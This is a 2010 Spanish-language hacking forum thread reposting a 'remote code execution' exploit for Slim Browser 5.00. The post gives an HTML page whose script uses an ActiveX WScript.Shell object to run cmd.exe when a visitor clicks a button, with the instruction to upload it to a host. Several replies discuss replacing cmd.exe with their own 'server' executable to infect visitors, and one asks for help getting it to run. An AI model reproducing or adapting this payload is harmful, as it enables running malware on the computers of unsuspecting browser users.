Indetectables

Indetectables es una Comunidad de Hacking, Seguridad Informática, Impresión 3d y Desarrollo
./index.php

Slim Browser v5.00 Remote Code Execution

https://indetectables.net/viewtopic.php?t=26670

Página 1 de 1

Slim Browser v5.00 Remote Code Execution

Publicado: 14 Sep 2010, 16:18
por Skillmax

Código: Seleccionar todo

===================================
Slim Browser v5.00 Remote Code Execution
===================================

# Author: PoisonCode
# Download Exploit Code
# Download Vulnerable app
# Title: Slim Browser v5.00
# Software Link:http://slimbrowser.flashpeak.com/release/sbsetup.exe
# Version: 5.00
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()

_____ _____ _ _
| __ \ / ____| (_) |
| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _
| ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| | ____) | __/ (__| |_| | | | | |_| |_| |
|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, |
__/ |
|___/

Exploit
---------------------------------------------------------
Lo guardamos y subimos a un host y listo

<script>
function go() {
w = new ActiveXObject("WScript.Shell");
w.run('cmd.exe');
return true;
}
</script>
<form>
<h1>Abrir Cmd Pwned by PoisonCode</h1>
<input type="button" value="Pwned"
onClick="return go()">
</form>

Otro.. saludos.

Re: Slim Browser v5.00 Remote Code Execution

Publicado: 14 Sep 2010, 18:01
por PackNot
Gracias Skillmax
voy a probarlo!
pd. solo una duda
en esta linea
w.run('cmd.exe');
cmd.exe debo cambiarlo por un link al executable?
saludos y gracias.

Re: Slim Browser v5.00 Remote Code Execution

Publicado: 14 Sep 2010, 19:18
por akonft
Como funciona el Exploit?

Re: Slim Browser v5.00 Remote Code Execution

Publicado: 14 Sep 2010, 21:19
por Word
Lo guardamos y subimos a un host y listo


Eso pone en el code, editando cmd.exe por el server ...

Re: Slim Browser v5.00 Remote Code Execution

Publicado: 14 Sep 2010, 21:30
por Skillmax
Exacto, lo de CMD, lo cambias por el server.

Re: Slim Browser v5.00 Remote Code Execution

Publicado: 14 Sep 2010, 22:14
por akonft
Me pueden ayudar?... Lo subi [Enlace externo eliminado para invitados] pero no hay manera no se ejecuta

PD: Miren el codigo de fuente en la pagina

¿Que falla?

Re: Slim Browser v5.00 Remote Code Execution

Publicado: 08 Oct 2010, 03:45
por pellex
muchas gracias !!! estou probando !

Re: Slim Browser v5.00 Remote Code Execution

Publicado: 11 Dic 2010, 18:19
por metaleroqwe
gracias por el aporte saludos...
Todos los horarios son UTC+02:00
Página 1 de 1

© Indetectables Team

Desarrollado por Indetectables LAB